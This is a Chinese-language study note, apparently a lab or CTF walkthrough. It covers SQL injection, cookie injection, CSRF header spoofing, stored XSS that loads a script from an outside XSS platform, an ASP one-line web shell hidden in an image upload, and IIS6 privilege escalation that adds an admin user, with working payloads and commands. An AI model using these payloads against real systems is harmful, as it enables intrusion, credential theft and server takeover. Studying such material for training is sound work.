Timo学习笔记

【2.1】手工注入：

1：点开这个带有？url的地址： http://120.203.13.111:6815/?id=1

2：在后面输入，and 1=1，and 1=2，and 1=3 发现存在注入漏洞。

3：利用order by二分法，发现注入的关键点是2

4：检查数据库版本：and 1=2 UNION SELECT 1,version()      是mysql 5.5.53

5：查询数据库名称： and 1=2 UNION SELECT 1,database()  是maoshe

6：查询数据库表名称：and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database()        是admin

7：查询查询密码 and 1=2 UNION SELECT 1,password from admin  flag是hellohack

【2.2】Cookie注入：

1：点开最新的新闻发现页面没有伪静态：http://120.203.13.111:8001/shownews.asp?id=171

2：用order by发现注入点11，但是有注入防护。

3：下载安装Chrome浏览器，这里用到了ModHeader插件将cookies改成

4：根据页面参数，猜测数据库表名，字段名，就可以拿到用户名和md5加密的密码

5：MD5网站解密。

6：猜测后台地址/admin

7：拿到flag：zkz{welcome-control}

【2.3】使用burp进行Csrf绕过：

管理员设置不允许外部链接操作后台，需要进行Csrf绕过。

1：FUZZ发现Host为127.0.0.1:8080 才可以进行通信

2：ModHeader插件，将Host设置为127.0.0.1:8080,Refere设置为http://127.0.0.1/admin123/default.asp

3：得到flag：zkz{fuzz-666}

【2.4】Xss Attack：

1：打开留言板，写入<script>alert('zkaq')</script>提交，并通过F12找到注入点。

2：到http://xsspt.com注册账号，重新回到留言板提交如下代码：

<script src=http://xsspt.com/APo4Kj?1526636210></script>

3：到xsspt找到我们的flag：zkz{xsser-g00d}

【2.5】Get Web Shell：

1：F12选择Application，然后看右边有一个cookies然后选择我们的题目的地址，然后点击空白的地方，

把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value

2：用cmd将写有<%eval request ("pass")%>的asp文件和jpg图片捆绑，改名xxx.cer

3：后台通过产品管理，将这个图片上传。

4：预览前台页面，打开图片获取url

5：启动菜刀添加shell，将图片url地址天上，选择asp，就可以找到flag：zkz{G3t_the_admin!Sh3ll}

【2.6】Exp提权 

1：通过菜刀上传cmd.exe iis6.exe

2：通过启动虚拟终端，填写iis6.exe物理地址，后面空格+“”里面填写：

Net user timo 123456  /add

添加用户。

3：通过iis6.0.exe提升权限：

Netlocalgroupadministrators timo /add

4：

tasklist -svc

netstat -ano

两个命令发现远程桌面链接端口是3389

5：远程登录，拿到我们的c盘flag：zkz{F3ck_power_3y3stem}